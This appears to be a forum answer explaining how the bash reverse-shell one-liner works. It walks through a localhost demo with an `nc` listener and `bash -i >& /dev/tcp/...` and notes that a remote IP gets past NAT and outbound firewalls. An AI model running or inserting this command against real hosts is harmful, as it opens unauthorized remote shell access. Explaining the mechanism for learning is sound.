It's an (insecure) reverse shell: the TCP connection is initiated by the target, which is the opposite of a "normal" remote shell (SSH, telnet), where the connection is initiated by the source, i.e. the client. Insecure because the session is plaintext and unauthenticated: anyone who can reach or intercept that port gets the shell. Let's try it with `localhost` instead of `10.0.0.1`:
- Open two tabs in your terminal.
- In tab 1, open TCP port 8080 and wait for a connection: `nc -lp 8080` (with OpenBSD netcat the flag form is `nc -l 8080`).
- In tab 2, open an interactive shell and redirect its I/O streams to a TCP socket: `bash -i >& /dev/tcp/localhost/8080 0>&1`, where
  - `bash -i`: "If the -i option is present, the shell is interactive." The shell prints a prompt and keeps reading commands instead of exiting on EOF-less input.
  - `>&`: "This special syntax redirects both stdout and stderr to the specified target."
  - `/dev/tcp/localhost/8080` (the argument of `>&`) is not a file on disk: bash handles this path itself and opens a TCP client connection to `localhost:8080`. This only works in bash (built with network redirection support), not in `sh` or `dash`.
  - `0>&1`: makes file descriptor 0 (stdin) a duplicate of fd 1 (stdout), which by now is the socket, so the shell also reads its input from the socket. Redirections are applied left to right, so `0>&1` has to come after `>&`.
- Rejoice as you have a prompt in tab 1: the prompt goes to stderr, which is the socket, so it shows up on the listener.
- Now imagine not using `localhost`, but some remote IP: the target connects out to whichever host is listening, which is why this works through NAT and outbound-only firewalls.